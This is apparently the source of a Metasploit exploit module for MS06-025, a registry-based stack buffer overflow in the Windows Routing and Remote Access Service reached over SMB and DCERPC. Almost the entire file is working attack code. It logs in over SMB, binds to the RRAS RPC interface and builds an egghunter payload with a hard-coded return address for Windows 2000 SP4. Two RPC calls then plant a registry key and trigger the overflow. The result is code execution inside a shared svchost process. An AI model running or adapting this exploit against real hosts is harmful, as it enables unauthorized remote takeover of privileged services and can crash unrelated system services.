GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
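class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Module metadata. Operational caveats worth reading before running this:
  #   * One shot per host: the first RPC call persists a phonebook structure
  #     under HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook and the
  #     overflow happens when the service reads it back. The key cannot be
  #     recreated by this module, so a wrong target burns the host until the
  #     key is removed by hand.
  #   * That key stays behind on the target; it is both the retry blocker and a
  #     straightforward forensic artifact for defenders to hunt for.
  #   * The service runs inside a shared svchost.exe, so a failed attempt can
  #     take unrelated system services down with it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',
        'Description' => %q{
          This module exploits a registry-based stack buffer overflow in the Windows Routing
          and Remote Access Service. Since the service is hosted inside svchost.exe,
          a failed exploit attempt can cause other system services to fail as well.
          A valid username and password is required to exploit this flaw on Windows 2000.
          When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
          Exploiting this flaw involves two distinct steps - creating the registry key
          and then triggering an overwrite based on a read of this key. Once the key is
          created, it cannot be recreated. This means that for any given system, you
          only get one chance to exploit this flaw. Picking the wrong target will require
          a manual removal of the following registry key before you can try again:
          HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook
        },
        'Author' => [ 'pusscat', 'hdm' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2006-2370' ],
          [ 'OSVDB', '26437' ],
          [ 'BID', '18325' ],
          [ 'MSB', 'MS06-025' ]
        ],
        # Code runs in the RRAS service host process, not as the SMB user.
        'Privileged' => true,
        'DefaultOptions' => {
          # Exit only the payload's thread; presumably chosen so that the
          # payload finishing does not tear down the shared svchost.exe host.
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Space' => 512,
          # NUL plus ',' '\' '.' ':' '$'. These are presumably delimiters in the
          # phonebook/registry string handling; the reason each one is listed is
          # not recorded here, so verify before trimming the set.
          'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
          # The overflow smashes ESP (see exploit), so the payload is moved off
          # its own buffer before it runs.
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Hard-coded `call esi` address; only valid for this exact build.
          # NOTE(review): the description mentions XP SP1 (with SMBPIPE=SRVSVC)
          # but no XP target is listed here -- confirm whether that guidance is
          # stale or a target entry is missing.
          [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2006-06-13',
        # NOTE(review): left as UNKNOWN_*, but the description already states a
        # service-crash failure mode and a persistent registry-key side effect;
        # these notes should be filled in to match.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Named pipe the RPC interface is reached through. The default serves
        # the Windows 2000 target; per the description, XP SP1 needs 'SRVSVC'.
        OptString.new('SMBPIPE', [ true, 'The named pipe to bind through (router, or SRVSVC for XP SP1)', 'router']),
      ]
    )
  end

  # Post authentication bugs are rarely useful during automation, and this one
  # is single-shot per host, so keep it out of automatic target selection.
  def autofilter
    false
  end

  # Authenticates over SMB, binds to the RRAS DCERPC interface through SMBPIPE,
  # and issues opnum 0xA twice with the same oversized phonebook structure: the
  # first call creates the registry key, the second triggers the overflow when
  # the service reads it back. The real payload is staged in eggdata and found
  # at runtime by an egghunter placed in the overflowed buffer.
  def exploit
    connect
    smb_login
    print_status("Trying target #{target.name}...")

    # hunter[0] is the searcher stub dropped into the overflowed buffer;
    # hunter[1] is the tagged (checksummed) egg carrying the encoded payload.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]

    # Filler byte picked at random from a set known not to be mangled by the
    # service's wide-string conversion routines.
    filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
    fil = filset[rand(filset.length)].chr

    # Bind to the actual DCERPC interface over the configured named pipe.
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    # Large guard blocks on both sides of the egg give the hunter a wide
    # landing zone wherever the structure ends up in memory.
    eggdata = (fil * 1024) + egg + (fil * 1024)

    # Egghunter stub placed at the offset ESI happens to point to after the
    # overflow (the return address below is a `call esi`).
    bof = fil * 178
    bof[84, hunter[0].length] = hunter[0]

    # Overwrite the SEH pointer even though ESP is smashed: filler, the return
    # address, then three filler bytes and 0xc0 so that the handle following
    # the ret is an invalid address.
    pat =
      (fil * 886) +
      NDR.long(target.ret) +
      (fil * 3) + "\xc0" +
      bof

    # Nested structure carrying the overflow pattern as its second string.
    type2 =
      NDR.string((fil * 1024) + "\x00") +
      NDR.string(pat + "\x00") +
      NDR.string((fil * 4096) + "\x00") +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    # Phonebook-style structure; only the CallbackMode/type2 part matters for
    # the overflow, the remaining numeric fields are randomized noise.
    type1 =
      NDR.long(rand(0xffffffff)) + # OperatorDial
      NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
      NDR.long(rand(0xffffffff)) + # UseLocation
      NDR.long(rand(0xffffffff)) + # ShowLights
      NDR.long(rand(0xffffffff)) + # ShowConnectStatus
      NDR.long(rand(0xffffffff)) + # CloseOnDial
      NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
      NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
      NDR.long(rand(0xffffffff)) + # SkipConnectComplete
      NDR.long(rand(0xffffffff)) + # NewEntryWizard
      NDR.long(rand(0xffffffff)) + # RedialAttempts
      NDR.long(rand(0xffffffff)) + # RedialSeconds
      NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
      NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
      NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
      NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
      NDR.long(rand(0xffffffff)) + # CallbackMode
      NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
      NDR.wstring("\x00" * 129) +
      NDR.long(rand(0xffffffff)) +
      NDR.wstring("\x00" * 520) +
      NDR.wstring("\x00" * 520) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.string("\x00" * 514) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    stubdata =
      type1 +
      NDR.long(rand(0xffffffff)) +
      eggdata

    print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

    begin
      # First call: the service persists the structure under the RAS Phonebook
      # key. This is the irreversible, one-shot step described in the metadata.
      print_status('Creating the malicious registry key...')
      dcerpc.call(0xA, stubdata)

      # Second call: the service reads the key back and the overflow fires.
      print_status('Attempting to trigger the base pointer overwrite...')
      dcerpc.call(0xA, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # A missing reply is deliberately not treated as failure: once control is
      # hijacked the call does not return normally, and the handler below still
      # needs its chance to pick up the session.
      print_status('No response from the service; the overflow may have fired, waiting for the handler...')
    end

    handler
    disconnect
  end
end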